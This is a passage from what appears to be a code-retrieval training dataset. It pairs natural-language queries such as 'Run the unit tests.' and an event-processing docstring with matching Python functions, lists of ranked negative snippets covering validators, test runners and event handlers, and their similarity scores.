'$or':\n if not self.handle_or(key, rule[key], obj):\n return False\n\n elif key == '$nor':\n if not self.handle_nor(key, rule[key], obj):\n return False\n\n elif not self.handle_field(key, rule[key], obj):\n return False\n\n return True", "def validate_type_keyword(self):\n valid = False\n if self.annot_types[0].upper() == \"TYPE\":\n valid = True\n if self.annot_types[0] != \"TYPE\":\n msg = f'File keyword \"TYPE\" provided as {self.annot_types[0]}'\n self.store_validation_issue(\"warn\", msg, \"format:cap:type\")\n else:\n msg = \"Malformed TYPE row, missing TYPE. (Case Sensitive)\"\n self.store_validation_issue(\"error\", msg, \"format:cap:type\")\n return valid", "def _match(self, key, attributes=None, context=None):\n matching_data = Sanitizer.ensure_int(self._get_matcher_input(key, attributes))\n if matching_data is None:\n return False\n return self._lower <= self.input_parsers[self._data_type](matching_data) <= self._upper", "def match(self, sentence) -> bool:\r\n if (any(word[0] in sentence.lower() for word in self.word_list if word[1] == \"partial\") or any(\r\n word[0].lower() == sentence.lower() for word in self.word_list if word[1] == \"full\")) and not any(\r\n word[0] in sentence.lower() for word in self.word_list if word[1] == \"not\"):\r\n return True\r\n else:\r\n return False", "def __checkcolumns(self, lista: List[str]) -> True:\r\n\r\n if isinstance(lista, list) is False:\r\n raise TypeError(f\"{lista} has to be a list.\")\r\n if len(lista) != 10:\r\n raise ValueError(f\"{lista} must have 10 columns\")\r\n\r\n errorlista = []\r\n\r\n # Regarding 'self.tiposDisponiveis',\r\n # Layer and Marked happens on the same column.\r\n # if there is 'layer', 'marked' won't show up, and viceversa.\r\n # Therefore 'self.tiposDisponiveis' is a list with 11 elements. While 'lista' is a list with 10 elements.\r\n\r\n for _ in lista:\r\n # searching for 'Layer'\r\n if self.tiposDisponiveis[0].lower() == _.lower():\r\n break\r\n else:\r\n # if 'Layer' wasn't found, searching for 'Marked'\r\n for _ in lista:\r\n if self.tiposDisponiveis[1].lower() == _.lower():\r\n break\r\n else:\r\n # If none of the two are present on the line, add to the error list\r\n errorlista.append(\"Layer Or Marked\")\r\n \r\n # repeat the search for all the remaining required values\"\"\"\r\n for _ in range(2, len(self.tiposDisponiveis)-1):\r\n for x in lista:\r\n if x.lower() == self.tiposDisponiveis[_].lower():\r\n break\r\n else:\r\n # Didn't find this column in the list\r\n errorlista.append(f\"{self.tiposDisponiveis[_]}\")\r\n\r\n # Raising the errors, if any occurred.\r\n if len(errorlista) > 0:\r\n raise ValueError(f\"{errorlista} <- These columns are missing from format.\")\r\n\r\n # Last column has to be 'Text'\r\n if lista[9].lower() != self.tiposDisponiveis[10].lower():\r\n raise ValueError(f\"{lista[9]} last element has to be 'Text'.\")\r\n \r\n return True", "def ParseIndex(self, text):\n taxonStart = 0\n taxonStop = len(self.alignment) - 1\n columnStart = 0\n columnStop = self.alignment.get_alignment_length() - 1\n if (',' not in text):\n self.AlertMessage('Invalid index format. (taxa or columns missing)', 'high')\n return (-1,-1,-1,-1)\n else:\n text = text.strip()\n indices = text.split(',')\n if (len(indices) > 2):\n self.AlertMessage('Invalid index format. (too many fields)', 'high')\n return (-1,-1,-1,-1)\n else:\n if (':' in indices[0]): #there is a range specified in the taxon index\n taxonIndices = indices[0].split(':')\n if (taxonIndices[0]): #a start taxon is specified\n try:\n taxonStart = int(taxonIndices[0].strip())\n except:\n self.AlertMessage('Invalid index format. (taxon start index not an integer)', 'high')\n return (-1, -1, -1, -1)\n if (taxonIndices[1]): #a stop taxon is specified\n try:\n taxonStop = int(taxonIndices[1].strip())\n except:\n self.AlertMessage('Invalid index format. (taxon stop index not an integer)', 'high')\n return (-1, -1, -1, -1)\n elif (indices[0]): #a single taxon is specified\n try:\n taxonStart = int(indices[0].strip())\n taxonStop = int(indices[0].strip())\n except:\n self.AlertMessage('Invalid index format. (taxon start or stop index not an integer)', 'high')\n return (-1, -1, -1, -1)\n if (':' in indices[1]): #there is a range specified in the taxon index\n columnIndices = indices[1].split(':')\n if (columnIndices[0]): #a start taxon is specified\n try:\n columnStart = int(columnIndices[0].strip())\n except:\n self.AlertMessage('Invalid index format. (column start index not an integer)', 'high')\n return (-1, -1, -1, -1)\n if (columnIndices[1]): #a stop taxon is specified\n try:\n columnStop = int(columnIndices[1].strip())\n except:\n self.AlertMessage('Invalid index format. (column stop index not an integer)', 'high')\n return (-1, -1, -1, -1)\n elif (indices[1]): #a single taxon is specified\n try:\n columnStart = int(indices[1].strip())\n columnStop = int(indices[1].strip())\n except:\n self.AlertMessage('Invalid index format. (column start or stop index not an integer)', 'high')\n return (-1, -1, -1, -1)\n if ((0 <= taxonStart <= taxonStop) & (0 <= columnStart <= columnStop)):\n return (taxonStart, taxonStop, columnStart, columnStop)\n else:\n self.AlertMessage('Invalid index range. (start > stop or index < 0)', 'high')\n return (-1,-1,-1,-1)", "def isMatched(expr):\n pass", "def check_columns(self, win: list) -> bool:\r\n for row in range(self.size):\r\n column = [self.tags[x][row] for x in range(self.size)]\r\n for j in range(len(column) - len(win) + 1):\r\n if win == column[j:j+self.win_condition]:\r\n return True", "def grammar_type(rules):\n for rule in rules:\n if len(rule[0]) > len(rule[1]):\n return 0\n for rule in rules:\n if len(rule[0]) != 1 or rule[0] != rule[0].upper():\n return 1\n for rule in rules:\n if rule != (\"S\", \"L\") and \\\n (len(rule[1]) > 2 or\n (len(rule[1]) == 2 and (rule[1][0] != rule[1][0].lower() or rule[1][1] != rule[1][1].upper())) or\n (len(rule[1]) == 1 and rule[1] != rule[1].lower())):\n return 2\n return 3", "def _is_valid_content_type_format(content_type: str) -> bool:\n return (\n _is_valid_ct(content_type)\n or _is_valid_pt(content_type)\n or _is_valid_set(content_type)\n or _is_valid_list(content_type)\n or _is_valid_dict(content_type)\n or _is_valid_union(content_type)\n or _is_valid_optional(content_type)\n )", "def eh_tabuleiro(tab):\r\n if not type(tab)==tuple:\r\n return False\r\n if len(tab)==3:\r\n for linha in tab:\r\n if not type(linha)==tuple:\r\n return False\r\n if len(linha)==3:\r\n for num in linha:\r\n if not (num in [-1,0,1] and type(num)==int):\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False\r\n return True", "def _valid_types(arguments, types):\n for arg in arguments:\n if type(arg) not in types:\n return False\n return True", "def _valid_types(arguments, types):\n for arg in arguments:\n if type(arg) not in types:\n return False\n return True", "def test_match_vals(self):\n f = lws.match_vals\n schema_rule = r'[a-z]*'\n assert f(schema_rule, 'abc') is True\n assert f(schema_rule, 'ABC') is False\n schema_rule = 7\n assert f(schema_rule, 7) is True\n assert f(schema_rule, 7.00) is True\n assert f(r'abc', None) is True\n assert f(lambda x: x < 10, 5) is True\n assert f(lambda x: x > 10, 9) is False", "def test_multiple_word(self):\n score = location.match_weight('weston super mare UK', ['weston super mare'])\n\n self.assertEqual(score, 1000)", "def isValid(text):\n return bool(re.search(r'\\b(start|stop) (look|watch|guard)ing\\b', text, re.IGNORECASE))", "def match(self, sentence) -> bool:\r\n pass", "def __input_data_ok(self, line=None):\n # valid pattern: 1407478022|www.facebook.com\n valid_pattern = re.compile(\"\\w{10}\\|\\w+\")\n if (line) and (re.match(valid_pattern, line)):\n return True\n else:\n return False", "def multiFieldsPairSearch(self, pair, sim):\n # Now search the index:\n title = pair[0].replace('_', ' ')\n content = pair[1]\n parser = MultiFieldQueryParser(\n [\"content_section\", \"title_article\"], self.analyzer)\n parser.setDefaultOperator(QueryParserBase.OR_OPERATOR)\n query1 = MultiFieldQueryParser.parse(parser, QueryParser.escape(title))\n query2 = MultiFieldQueryParser.parse(\n parser, QueryParser.escape(content))\n\n bq = BooleanQuery.Builder()\n bq.add(query1, BooleanClause.Occur.FILTER)\n bq.add(query2, BooleanClause.Occur.SHOULD)\n\n self.searcher.setSimilarity(sim)\n hits = self.searcher.search(bq.build(), 6).scoreDocs\n return hits", "def _can_handle_query(cls, *query):\n required = {a.Time, a.Instrument}\n optional = {a.Wavelength}\n all_attrs = {type(x) for x in query}\n\n ops = all_attrs - required\n # If ops is empty or equal to optional we are ok, otherwise we don't\n # match\n if ops and ops != optional:\n return False\n\n # if we get this far we have either Instrument and Time\n # or Instrument, Time and Wavelength\n for x in query:\n if isinstance(x, a.Instrument) and x.value.lower() == 'norh':\n return True\n\n return False", "def validRange(line):\n line_col = str.split(line)\n chrom = line_col[0]\n pos = line_col[1]\n# any(lower <= postcode <= upper for (lower, upper) in [(1000, 2249), (2555, 2574), ...])\n if any(float(low) <= float(pos) <= float(high) for (low,high) in TE_ranges[chrom]):\n return False\n return True", "def valid_type_in_colspan(arch, **kwargs):\n return all(\n attrib.isdigit()\n for attrib in arch.xpath('//@colspan')\n )", "def consequence_filter(line, index, consequence_list):\n consequence = re.split(r'\\t+', line.rstrip('\\t'))[index]\n if not any(variant_type in consequence for variant_type in\n consequence_list):\n return True\n else:\n return False", "def _validate_time_params(time_params):\n allowed_params = (\"Ntimes\", \"start_time\", \"integration_time\", \"time_array\")\n if time_params.get(\"time_array\", None) is not None:\n return True\n elif all(time_params.get(param, None) is not None for param in allowed_params[:-1]):\n # Technically, start_time doesn't need to be specified, since it has a\n # default setting in io.py, but that might not be set in stone.\n return True\n else:\n return False", "def checkStructure(self, result, resultType):\n res = True\n if resultType:\n try:\n structure = json.loads(resultType)\n result_structure = self.getStructure(result)\n res = structure[\"type\"] == result_structure[\"type\"] and all(elem in list(result_structure[\"columns\"])\n for elem in list(structure[\"columns\"])) and all(elem in list(result_structure[\"indexes\"])\n for elem in list(structure[\"indexes\"]))\n except Exception as ex:\n print(f\"Error checking structure: {ex}\")\n\n return res", "def check_match(possible_match):\n top = \"\"\n bottom = \"\"\n for tup in possible_match:\n top += tup[0]\n bottom += tup[1]\n return top == bottom", "def match(self, digit: int) -> bool:\n return any(_range.match(digit) for _range in self.ranges)" ]
[ "0.65751725", "0.56603086", "0.557421", "0.5525039", "0.54756975", "0.5400486", "0.53058875", "0.52834386", "0.5266304", "0.5260166", "0.5238574", "0.5214264", "0.5185073", "0.51797396", "0.51623565", "0.5152065", "0.5134428", "0.5108154", "0.5108154", "0.51043475", "0.5099916", "0.5099904", "0.5077996", "0.50713813", "0.50662524", "0.5049845", "0.5047419", "0.50461596", "0.5033521", "0.5026133", "0.5022566", "0.50074893", "0.50037915", "0.500257", "0.49939445", "0.49858096", "0.4985794", "0.49852213", "0.4984102", "0.4973671", "0.4948205", "0.4944568", "0.4922287", "0.49160787", "0.4908858", "0.48978627", "0.4896227", "0.48935732", "0.4891425", "0.48886833", "0.48868525", "0.48789686", "0.4878842", "0.48737213", "0.48729736", "0.4872293", "0.4872293", "0.48642015", "0.4858499", "0.48576236", "0.48574552", "0.485586", "0.48540843", "0.48494995", "0.4839469", "0.48357302", "0.4825301", "0.48192665", "0.48166043", "0.4812888", "0.4812746", "0.48103774", "0.48073503", "0.48017025", "0.48013481", "0.47963572", "0.47865295", "0.47825485", "0.47755718", "0.47716329", "0.47716218", "0.47669345", "0.47649232", "0.4760222", "0.47583234", "0.47583234", "0.4757785", "0.47548702", "0.4742185", "0.47400045", "0.4735029", "0.47346842", "0.4727534", "0.4726323", "0.47247902", "0.47204542", "0.472013", "0.47198048", "0.47159383", "0.46993914" ]
0.62283635
1
Run the unit tests.
def test(): import unittest tests = unittest.TestLoader().discover('tests') unittest.TextTestRunner(verbosity=2).run(tests)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def runTests(self):\n \n pass", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def main():\n run_test_all()", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def tests():", "def test():\n import unittest\n tests = unittest \n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def runtest(self):", "def test():\n import unittest\n tests = unittest.TestLoader().discover(tests)\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\r\n import unittest\r\n tests=unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\r\n import unittest\r\n tests = unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\r\n import unittest\r\n tests = unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def __main() :\n launchTests()", "def runtests():\n #- Load all TestCase classes from desistar/test/test_*.py\n tests = desistar_test_suite()\n #- Run them\n unittest.TextTestRunner(verbosity=2).run(tests)", "def unitary_test():", "def runAll():\n\n loader = unittest.TestLoader()\n test_dir = pkg_resources.resource_filename('frvcpy.test','.')\n suite = loader.discover(test_dir)\n\n runner = unittest.TextTestRunner(verbosity=2)\n runner.run(suite)", "def test():\n loader = unittest.TestLoader()\n suite = loader.discover(os.path.dirname(__file__))\n runner = unittest.TextTestRunner()\n runner.run(suite)", "def run_tests(self):\n raise NotImplementedError", "def main():\n fix_sys_path()\n result = unittest.TextTestRunner(verbosity=2).run(createTestSuite())\n\n if result.testsRun != EXPECTED_TEST_COUNT:\n raise Exception(\n 'Expected %s tests to be run, not %s.' % (EXPECTED_TEST_COUNT, result.testsRun))\n\n if len(result.errors) != 0 or len(result.failures) != 0:\n raise Exception(\n \"Functional test suite failed: %s errors, %s failures of %s tests run.\" % (\n len(result.errors), len(result.failures), result.testsRun))", "def runTest(self):\n\t\tself.setUp()\n\t\tself.test_postopProgramming1()", "def test():\n import unittest\n import tests\n tests = unittest.TestLoader().discover('tests', pattern='*tests.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n testmodules = [\n 'bettermathlib_tests',\n 'randomwebapp_tests',\n ]\n suite = unittest.TestSuite()\n for t in testmodules:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))\n unittest.TextTestRunner(verbosity=2).run(suite)", "def run():\n\tsubsuite_list = []\n\tfor _, modname, _ in pkgutil.iter_modules(test.__path__):\n\t\tif modname.startswith(\"test_\"):\n\t\t\tmodule = importlib.import_module('test.' + modname)\n\t\t\tsubsuite = unittest.TestLoader().loadTestsFromModule(module)\n\t\t\tsubsuite_list.append(subsuite)\n\tsuite = unittest.TestSuite(subsuite_list)\n\n\tprint(\"Testing:\\n\")\n\tunittest.TextTestRunner(verbosity=2).run(suite)", "def runTest(self):\r\n self.setUp()", "def main():\n vunit = vunit_pkg.VUnit.from_argv()\n vunit = map_sources(vunit)\n run_tests(vunit)", "def run_main(): # pragma: no cover\n RunTestsCLI.run()", "def runalltests():\n doctest.testmod()", "def test_script(self) -> None:\n main()", "def run_tests():\n \n test_constructor_positive()\n test_constructor_negative()\n test_game_move_positive()\n test_game_move_negative()\n test_game_move_edge()\n print(\"Congratulations ! You passed all the game test cases.\")", "def runTest(self):\n self.setUp()\n self.test_FiducialTransform1()", "def run_test(self):\n raise NotImplementedError", "def test():\n tests = unittest.TestLoader().discover('project/tests', pattern='test*.py')\n result = unittest.TextTestRunner(verbosity=2).run(tests)\n if result.wasSuccessful():\n return 0\n sys.exit(result)", "def test():\r\n import unittest \r\n tests = unittest.TestLoader().discover('tests_sql') \r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def runTest(self):\n self.setUp()\n self.test_FiberDistance1()", "def test():\n\n tests = unittest.TestLoader().discover('api/tests/', pattern='*/test_*.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_basic_execution(self):", "def run(self) -> None:\n self.test_sanity()\n if self.has_errors():\n return\n\n tests: List[Callable[[], None]] = [\n self.test_headlines_predefined,\n self.test_headlines_required,\n self.test_headlines_dependencies,\n self.test_headlines_order,\n self.test_headlines_named_entities,\n self.test_named_entities,\n self.test_reading_attributes,\n self.test_forbidden_words,\n self.test_unwanted_words,\n self.test_police_abbreviations,\n self.test_spelling,\n self.test_grammar_rules_regex,\n ]\n\n for test in tests:\n if self.stop_on_error and self.has_errors():\n break\n test()", "def run_all_unit_tests(cls):\n suites_list = []\n for test_class in cls.TESTS:\n suite = unittest.TestLoader().loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n result = unittest.TextTestRunner().run(unittest.TestSuite(suites_list))\n if not result.wasSuccessful() or result.errors:\n raise Exception(result)", "def run_tests():\n test_command = \"pytest -s \" + os.path.join(root_path, \"cases\", \"test_cases.py::TestCases::test_cases\") + \" --html=\" + os.path.join(root_path, \"reports\", \"qa_testing_report.html\")\n\n subprocess.run(test_command, shell=True)", "def run_tests(self):\n\n self.manifest_path = os.path.join('tests',\n 'functional',\n 'manifest.ini')\n TestRun.run_tests(self)", "def runTest(self):\n self.setUp()\n self.test_modul1()", "def runTest(self):\n self.setUp()\n self.test_STLModelBuilder1()", "def main():\n # add all new test suites per test module here\n suite_date = test_date.suite()\n suite_ng = test_ng.suite()\n suite_page = test_page.suite()\n suite_container = test_container.suite()\n\n # add the suite to be tested here\n alltests = unittest.TestSuite((suite_date,\n suite_ng,\n suite_page,\n suite_container))\n\n # run the suite\n runner = unittest.TextTestRunner()\n runner.run(alltests)", "def runTest(self):\n self.setUp()\n self.test_BiplaneRegistration1()", "def runTest(self):\n self.setUp()\n self.test_NeuroPath1()", "def startTestRun(self):", "def run_tests(self):\n manifest = manifestparser.TestManifest(\n manifests=[os.path.join(self.repository_path, self.manifest_path)],\n strict=False)\n\n tests = manifest.active_tests(**mozinfo.info)\n self._mozmill.run(tests, self.options.restart)\n\n # Whenever a test fails it has to be marked, so we quit with the correct exit code\n self.last_failed_tests = self.last_failed_tests or self._mozmill.results.fails\n\n self.testrun_index += 1", "def runTest(self):\n self.setUp()\n self.test_visuThreeD1()", "def test(cline):\n print(\"Running unit tests.\")\n cline.run(\"TF_CPP_MIN_LOG_LEVEL=3 python3 -m unittest\")", "def test(self):\n pass", "def test_main():\n # Setup\n # Exercise\n # Verify", "def runTest(self):\n self.setUp()\n self.test_ProstateReporting1()", "def test():\n nose.run()", "def tests():\n api.local('nosetests')", "def main():\n try:\n unittest.main(testLoader=BetterLoader(), defaultTest='suite')\n except Exception:\n import sys\n import traceback\n traceback.print_exc()\n sys.exit(1)", "def tests(context):\n black(context)\n isort(context)\n flake8(context)\n pylint(context)\n yamllint(context)\n pydocstyle(context)\n bandit(context)\n pytest(context)\n\n print(\"All tests have passed!\")", "def run_tests():\n testfiles = ['tests.test_overall']\n exclude = ['__init__.py', 'test_overall.py']\n for t in glob(pjoin('tests', '*.py')):\n if True not in [t.endswith(ex) for ex in exclude]:\n if basename(t).startswith('test_'):\n testfiles.append('tests.%s' % splitext(basename(t))[0])\n\n suites = []\n for file in testfiles:\n __import__(file)\n suites.append(sys.modules[file].suite)\n\n tests = unittest.TestSuite(suites)\n runner = unittest.TextTestRunner(verbosity=2)\n\n # Disable logging output\n logging.basicConfig(level=100)\n logging.disable(100)\n\n result = runner.run(tests)\n return result", "def setUp(self):\r\n print('---------------------------------------------\\n')\r\n print('STARTING TEST...')", "def test(self):\n for arch, python in self.python:\n self.run(f\"{python} -m pytest\")", "def setUp(self):\n MainTests.setUp(self)", "def RunTest(self):\n self.TestLs()\n self.TestTerminate()\n self.TestMultipleProcesses()", "def unittest():\n from a6test import test_all\n test_all()", "def test_all():\n test_get_to()\n test_error_type()\n test_exchange()\n print(\"All tests passed.\")", "def main():\n unittest.main(exit=False, verbosity=2)\n return 0", "def _run_ci_test():\n _run_install(False)\n _run_coverage_html(False)\n _run_typecheck_xml(False)\n _run_lint(True)", "def runTest(self):\n self.setUp()\n self.test_JupyterNotebooks1()", "def runTest(self):\r\n self.setUp()\r\n self.test_sceneImport24281()", "def run(self):\n if self.all:\n cmd = self.apply_options(self.test_all_cmd)\n self.call_and_exit(cmd)\n else:\n cmds = (self.apply_options(self.unit_test_cmd, (\"coverage\",)),)\n if self.coverage:\n cmds += (self.apply_options(self.coverage_cmd),)\n self.call_in_sequence(cmds)", "def run(self, test, env):\n\n raise NotImplementedError", "def runTest(self):\n self.setUp()\n self.test_SegmentEditor1()", "def _run_unittest(tests, verbose, use_gdb, gtest_filter, gtest_list_tests):\n failed_tests = []\n unfound_tests = []\n for test in tests:\n index = 1\n while True:\n test_info = _read_test_info('%s.%d.json' % (test, index))\n if not test_info:\n # The format of test info file is [test name].[index].json, where index\n # is one of consecutive numbers from 1. If the test info file for index\n # 1 is not found, that means the corresponding test does not exist.\n if index == 1:\n unfound_tests.append(test)\n break\n command = _construct_command(test_info, gtest_filter, gtest_list_tests)\n if verbose:\n print 'Running:', command\n args = shlex.split(command)\n if use_gdb:\n unittest_util.run_gdb(args)\n else:\n returncode = subprocess.call(args)\n if returncode != 0:\n print 'FAILED: ' + test\n failed_tests.append('%s.%d' % (test, index))\n index += 1\n if unfound_tests:\n print 'The following tests were not found: \\n' + '\\n'.join(unfound_tests)\n if failed_tests:\n print 'The following tests failed: \\n' + '\\n'.join(failed_tests)\n if unfound_tests or failed_tests:\n return -1\n return 0", "def run_tests():\n\n parser = argparse.ArgumentParser(description=\"Run tests for the T2K Data Manager.\")\n parser.add_argument(\n \"-w\", \"--write\", action=\"store_true\", help=\"do write tests. Default: read only\"\n )\n parser.add_argument(\n \"-t\",\n \"--tape\",\n action=\"store_true\",\n help=\"do write tape storage tests. Default: disks only\",\n )\n parser.add_argument(\n \"-p\",\n \"--parallel\",\n default=2,\n type=int,\n help=\"specify how many parallel processes to test. Defaul: 2\",\n )\n parser.add_argument(\n \"-b\", \"--backend\", default=None, help=\"specify which backend to use\"\n )\n\n args = parser.parse_args()\n if args.backend is not None:\n dm.config.backend = args.backend\n dm.backend = backends.get_backend(dm.config)\n\n run_read_only_tests(tape=args.tape, parallel=args.parallel)\n if args.write:\n run_read_write_tests(tape=args.tape, parallel=args.parallel)\n\n print_(\"All done.\")", "def test():\n for cmd in [\n \"pytest --verbose --cov pike/ --cov-report term --cov-report html tests/\",\n ]:\n _run_in_venv(shlex.split(cmd))\n for linter in [[\"black\", \"--check\"], [\"flake8\"], [\"isort\", \"--check\"]]:\n _run_in_venv(linter + TEST_FILES)\n\n _run_in_venv(\n [\"mypy\", \"pike/\", \"tests/\", \"setup.py\", \"pikefile.py\", \"--show-error-codes\"]\n )\n _run_in_venv([\"mypy\", \"examples/\"])\n _run_in_venv([\"bandit\", \"-r\", \"pike/\"])", "def runTest(self):\n self.setUp()\n self.test_SegmentDicom1()", "def runTest(self):\r\n self.setUp()\r\n self.test_SegmentEditor1()", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass", "def setUp(self):\n \n \n pass" ]
[ "0.85183024", "0.82517105", "0.81414855", "0.8076668", "0.8069847", "0.80517304", "0.8050559", "0.801922", "0.7989364", "0.7988354", "0.79849315", "0.7968269", "0.7955071", "0.7955071", "0.79471713", "0.79471713", "0.79471713", "0.7850217", "0.7809605", "0.7801223", "0.7774706", "0.7701633", "0.76810014", "0.7662626", "0.765403", "0.75881755", "0.75657576", "0.75001276", "0.7491264", "0.7463525", "0.7394416", "0.73718035", "0.7367032", "0.7351095", "0.7327775", "0.7324071", "0.7316174", "0.7316133", "0.73124266", "0.7310003", "0.7308142", "0.72903705", "0.72761583", "0.72559726", "0.72417206", "0.72323096", "0.72318786", "0.7229984", "0.7222241", "0.7216678", "0.7198819", "0.7198289", "0.71759677", "0.7172629", "0.71718615", "0.7156905", "0.71532303", "0.71375525", "0.7126207", "0.7116378", "0.7112115", "0.7104717", "0.71044695", "0.7091796", "0.70854384", "0.70835596", "0.70793", "0.707824", "0.70768106", "0.70767236", "0.70722055", "0.70459664", "0.7033137", "0.7031282", "0.7030975", "0.7026528", "0.701949", "0.7013642", "0.7009026", "0.7004702", "0.69990396", "0.69990396", "0.69990396", "0.69990396", "0.69990396", "0.69990396", "0.69990396" ]
0.7952072
22
Processor pool entry point. Responsible for processing and writing one event from the message bus
def process_event(event_processor, event): log = logging.getLogger(__name__) try: log.debug("Processing Event: %s - %s" % (event["content_type"], event["routing_key"])) event_processor.process_event(event["content_type"], event["routing_key"], event["body"]) except: log.exception("Unable to process event")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process(self, event):\n pass", "def event_queue_proc(self,event):\r\n event()", "def process_event(self, event):\r\n pass", "def process_amqp_events(self):\n self.connection.process_data_events()", "def ProcessEvents(self):\n self.work_queue.put(self.__ProcessEventsAsync)", "def run(self):\n self.class_inst_obj.processor(self.msg)", "def process():", "async def proccess_message(self, *args):\n\n await self.used_middlewares[0].compute(*args)", "def run(self):\n\n self.debug = self.forwarder_options.get(\"debug\", \"0\") != \"0\"\n if self.debug:\n self.logger.setLevel(logging.DEBUG)\n\n processor_count = int(self.forwarder_options.get(\"message_processor_count\", 1))\n cpu_count = multiprocessing.cpu_count()\n if processor_count > cpu_count:\n self.logger.info(\"processor_count (%s) > cpu_count. Defaulting to cpu_count\", (processor_count, cpu_count))\n processor_count = cpu_count\n\n self.event_processor = EventProcessor(self.forwarder_options)\n self.processor_pool = multiprocessing.Pool(processor_count)\n\n while True:\n try:\n self.consume_message_bus(test=self.testing)\n except Exception as e:\n self.retry_attempts += 1\n if self.retry_attempts > self.max_retry_attempts:\n self.logger.critical(\"Too many attempts to reconnect (%d). Exiting now.\" % self.max_retry_attempts)\n break\n\n if isinstance(e, pika.exceptions.AMQPConnectionError) or isinstance(e, pika.exceptions.ConnectionClosed):\n self.logger.error(\"Connection is closed or refused, retrying in %s seconds\" % self.retry_interval)\n else:\n self.logger.exception(\"An unexpected error occurred, retrying in %s seconds\" % self.retry_interval)\n\n if self.connection is not None:\n self.connection.close()\n self.connection = None\n\n time.sleep(self.retry_interval)", "def process_messages(self):\n pass", "def processMessage(self, *args, **kwargs):\r\n pass", "def process(self):\n pass", "def handle_event(self, ev):\n msg = (\"Handling event '%s' \" % (ev.id))\n LOG.info(msg)\n try:\n msg = (\"Worker process with ID: %s starting \"\n \"to handle task: %s of topic: %s. \"\n % (os.getpid(), ev.id, lb_const.LBAAS_AGENT_RPC_TOPIC))\n LOG.debug(msg)\n\n method = getattr(self, \"_%s\" % (ev.id.lower()))\n method(ev)\n except Exception as err:\n msg = (\"Failed to perform the operation: %s. %s\"\n % (ev.id, str(err).capitalize()))\n LOG.error(msg)\n finally:\n if ev.id == lb_const.EVENT_COLLECT_STATS_V2:\n \"\"\"Do not say event done for collect stats as it is\n to be executed forever\n \"\"\"\n pass\n else:\n msg = (\"Calling event done for event '%s' \" % (ev.id))\n LOG.info(msg)\n self.sc.event_complete(ev)", "def process(self, message: Message, **kwargs: Any) -> None:", "def process(self, msg):\n print \"HANDLER: received a msg: %s\" % msg", "def process_msg(msg):\n time.sleep(random.randint(2, 10))\n print \"processor|%s::Processed message: %s\" % (UID, msg.body)", "def process():\n pass", "def process(self):", "def process(self):", "def process(self):", "def process_thread(self):", "def main_task_handler():\n context = zmq.Context()\n\n # socket to sending messages to save\n save_sender = context.socket(zmq.PUSH)\n save_sender.connect(SAVE_PUSH_QUEUE_ADDR)\n\n c = 0\n while (True):\n # simulate some very complex computation\n (x, y) = (random.gauss(0, 1), random.gauss(0, 1))\n result = { 'unit': computer_id, 'counter': c, 'x' : x, 'y': y}\n\n # send message to sender\n save_sender.send_json(result)\n\n # take it easy\n time.sleep(1)\n\n c += 1", "def process(self) -> List['Event']:\n raise NotImplementedError", "def process(self, message=None):\n\n while self.running:\n message = self.channel.basic.get(self.queue)\n if message:\n content = message.body\n\n # log message\n if self.debug:\n self.log(\"Recieved: \" + str(content))\n\n # send to child nodes\n self.scatter(Message(**self.parse(content)))\n else:\n # yield to other greenlet\n # self.tick()\n self.sleep(1)", "def process(self):\n raise NotImplementedError", "def send_messages(self):\n if self.messages:\n messages, self.messages = self.messages, []\n self.mpub(\"events.%s\" % config.pool, messages)", "def publishEvent(eventName,publisher, msg):", "def __call__(self, event, payload):\n logging.debug(\"Event: %s %s\" % (event, payload))\n\n # register new task\n if event == \"CRAB_Cmd_Mgr:NewTask\":\n self.newTaskRegistration(payload)\n elif event == \"KillTask\":\n taskUniqName, cmdRng = payload.split(':')\n self.killingRequestes[taskUniqName] = cmdRng\n # usual stuff\n elif event == \"TaskRegisterComponent:StartDebug\":\n logging.getLogger().setLevel(logging.DEBUG)\n elif event == \"TaskRegisterComponent:EndDebug\":\n logging.getLogger().setLevel(logging.INFO)\n elif event == \"TaskRegisterComponent:HeartBeat\":\n logging.info(\"HeartBeat: I'm alive \")\n self.ms.publish(\"TaskRegisterComponent:HeartBeat\",\"\",self.HeartBeatDelay)\n self.ms.commit()\n else:\n logging.info('Unknown message received %s + %s'%(event,payload))\n return True", "def processEvent(self):\n # Note: break out of event dispatch loop when closedown event is received\n # and closing flag is set. This is to prevent DoS attack by faked closedown\n # event type, and to ensure that prior events received are all processed.\n delay_on_error_min = 0.125 # Back off retry interval on error..\n delay_on_error_max = 20.0 # ..\n delay_on_error = delay_on_error_min # ..\n while True:\n if delay_on_error < delay_on_error_max:\n delay_on_error *= 2\n try:\n # PLEASE NOTE: In the event that the HTTPC is run as duplex, not simplex\n # then the post methods will be delayed if nothing is sent down to the client\n # from the server. This timeout is controlled by 